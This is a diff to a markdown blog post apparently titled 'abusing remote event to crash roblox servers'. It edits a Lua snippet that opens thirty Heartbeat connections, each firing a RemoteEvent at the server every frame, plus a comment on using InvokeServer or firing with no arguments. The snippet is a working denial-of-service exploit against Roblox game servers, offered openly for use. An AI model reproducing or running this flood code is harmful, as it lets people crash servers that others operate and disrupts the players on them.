bui1d-failed/site/src/content/posts/abusing-remote-event-to-crash-roblox-servers/index.md

 for i = 1, 30 do -- create 30 heartbeat connections
     runservice.Heartbeat:Connect(function() -- sending event per frame
-        eventName:FireServer(unpack(arguments)) -- FireServer or InvokeServer (in simple spy, if remoteevent is flagged as blue, use :InvokeServer(arguments)) end) end
+        eventName:FireServer(unpack(arguments)) -- FireServer or InvokeServer (in simple spy, if remoteevent is flagged as blue, use :InvokeServer(arguments))
+        --eventName:FireServer() -- if the event has no arguments end) end
 ```